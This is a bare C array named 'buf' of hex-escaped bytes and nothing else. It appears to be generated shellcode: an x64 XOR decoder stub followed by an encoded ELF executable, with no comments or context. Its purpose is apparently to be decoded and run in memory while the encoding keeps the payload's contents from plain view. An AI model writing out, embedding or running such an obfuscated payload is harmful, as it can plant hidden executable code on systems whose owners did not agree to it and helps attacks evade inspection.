unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xb6\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xc2\xe7\x8a"
"\x95\xde\x99\x18\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xbc"
"\xa2\xf8\xd3\xdd\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19"
"\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xfd\xa2\xc6\xd3\xdc"
"\x98\x19\x55\xbd\xa2\xc6\xd3\x9c\x98\x19\x55\xbd\xa2\x86"
"\xd3\xd9\x98\x1b\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xbd"
"\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19"
"\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\xa2\xc6\xd3\xdc"
"\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\xa2\xc6"
"\xd3\xdc\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xbc"
"\xa2\xc6\xd3\xdd\x98\x19\x55\xbb\xa2\xc6\xd3\xdc\x98\x19"
"\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\x3d\xa3\xc6\xd3\xdc"
"\x98\x19\x55\xab\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\xa2\xc6"
"\xd3\xdc\x98\x19\x55\xad\xa2\xc6\xd3\xdc\x98\x19\x55\xbd"
"\xa2\xc6\xd3\xdc\x98\x19\x55\xba\xa2\xc6\xd3\xdf\x98\x19"
"\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\xa2\xc6\xd3\xdc"
"\x98\x19\x55\x1d\xa3\xc6\xd3\xdc\x98\x19\x55\x9c\xa2\xc6"
"\xd3\xdc\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xbc"
"\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19"
"\x55\xac\xa2\xc6\xd3\xde\x98\x19\x55\xbd\xa2\xc6\xd3\xdc"
"\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\x6d\xa3\xc6"
"\xd3\xdc\x98\x19\x55\xdd\xa2\xc6\xd3\xdc\x98\x19\x55\xb9"
"\xa2\xc6\xd3\xdf\x98\x19\x55\xb5\xa2\xc6\xd3\xdc\x98\x19"
"\x55\xa5\xa2\xc6\xd3\xdc\x98\x19\x55\xa4\xa2\xc6\xd3\xdf"
"\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\xa2\xc6"
"\xd3\xdc\x98\x19\x55\x8d\xa0\xc6\xd3\xdc\x98\x19\x55\xa4"
"\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19"
"\x55\xbc\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\xa2\xc6\xd3\xdc"
"\x98\x19\x55\xd7\x99\x9e\x4a\x8e\xc6\x51\xec\x92\xc0\xaf"
"\xbd\xf3\xb7\x6a\x3d\xef\xf3\x92\x8c\xd3\x9d\x19\x55\xbd"
"\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\x8c\xb2\xb6\xa4\xec\x19"
"\x7b\xce\xca\xb5\xa7\xae\xec\x78\x37\xbd\x8c\xb5\xaa\xb1"
"\xec\x78\x37\xbd\x8c\xb5\xa7\xae\xec\x78\x37\xbd\xa2\xc6"
"\xd3\xdc\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xbd"
"\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19"
"\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xbc\xa2\xc6\xd3\xd8"
"\x98\xe8\xaa\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\xa2\xc6"
"\xd3\xdc\x98\x19\x55\xbd\xa2\xc6\xd3\xdf\x98\x18\x55\xbd"
"\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19"
"\x55\xaf\xa2\xc6\xd3\xcc\x98\x18\x55\xbd\xa2\xc6\xd3\xdc"
"\x98\x19\x55\xbd\xa2\xc6\xd3\xdc\x98\x19\x55\xbd\x8c\xe8"
"\xfc\xbd\xeb\x74\x63\x89\x8d\xa7\xa0\xb1\xa8\x2f\x7b\xce"
"\xa2\x99\xa0\xa8\xf9\x6b\x21\xbd\xa2\xc6\xd3\xdc\x98\x19"
"\x55";
